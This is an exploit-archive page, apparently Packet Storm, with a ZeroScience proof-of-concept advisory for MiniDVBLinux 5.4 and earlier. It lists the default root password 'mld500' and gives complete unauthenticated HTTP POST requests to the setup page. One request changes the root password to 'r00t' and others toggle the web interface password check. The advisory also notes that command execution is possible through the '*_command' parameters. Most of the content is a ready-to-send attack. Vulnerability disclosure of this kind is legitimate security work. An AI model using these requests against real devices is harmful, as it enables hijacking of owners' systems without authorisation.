exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

MiniDVBLinux 5.4 Change Root Password

MiniDVBLinux 5.4 Change Root Password
Posted Oct 17, 2022
Authored by LiquidWorm | Site zeroscience.mk

MiniDVBLinux versions 5.4 and below root password changing proof of concept exploit.

tags | exploit, root, proof of concept
SHA-256 | 0517758916f5224ee0d63a86e0026b8a9d83c177f294a5ec74c5a0938e44fc11

MiniDVBLinux 5.4 Change Root Password

Change Mirror Download

MiniDVBLinux 5.4 Change Root Password PoC


Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4

Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
way to convert a standard PC into a Multi Media Centre based on the
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
Linux based Digital Video Recorder: Watch TV, Timer controlled
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
via browser, and a lot more. MLD strives to be as small as possible,
modular, simple. It supports numerous hardware platforms, like classic
desktops in 32/64bit and also various low power ARM systems.

Desc: The application allows a remote attacker to change the root
password of the system without authentication (disabled by default)
and verification of previously assigned credential. Command execution
also possible using several POST parameters.

Tested on: MiniDVBLinux 5.4
BusyBox v1.25.1
Architecture: armhf, armhf-rpi2
GNU/Linux 4.19.127.203 (armv7l)
VideoDiskRecorder 2.4.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2022-5715
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php


24.09.2022

--


Default root password: mld500

Change system password:
-----------------------

POST /?site=setup&section=System HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
Cache-Control: max-age=0
Connection: keep-alive
Content-Length: 778
Content-Type: application/x-www-form-urlencoded
Cookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfba
Host: ip:8008
Origin: http://ip:8008
Referer: http://ip:8008/?site=setup&section=System
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
sec-gpc: 1

APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save&params=&changed=SYSTEM_PASSWORD+


Pretty post data:

APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD: r00t
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Kumanovo
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
action: save
params:
changed: SYSTEM_PASSWORD


Eenable webif password check:
-----------------------------

POST /?site=setup&section=System HTTP/1.1

APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD:
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Berlin
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
WEBIF_PASSWORD_CHECK: 1
action: save
params:
changed: WEBIF_PASSWORD_CHECK


Disable webif password check:
-----------------------------

POST /?site=setup&section=System HTTP/1.1

APT_UPGRADE_CHECK: 1
APT_SYSTEM_ID: 1
APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass
APT_PACKAGE_CLASS: stable
SYSTEM_NAME: MiniDVBLinux
SYSTEM_VERSION_command: /etc/setup/base.sh setversion
SYSTEM_VERSION: 5.4
SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword
SYSTEM_PASSWORD:
BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi
BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd
BUSYBOX_NTPD: 1
LOG_LEVEL: 1
SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog
SYSLOG_SIZE:
LANG_command: /etc/setup/locales.sh setlang
LANG: en_GB.UTF-8
TIMEZONE_command: /etc/setup/locales.sh settimezone
TIMEZONE: Europe/Berlin
KEYMAP_command: /etc/setup/locales.sh setkeymap
KEYMAP: de-latin1
action: save
params:
changed: WEBIF_PASSWORD_CHECK
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close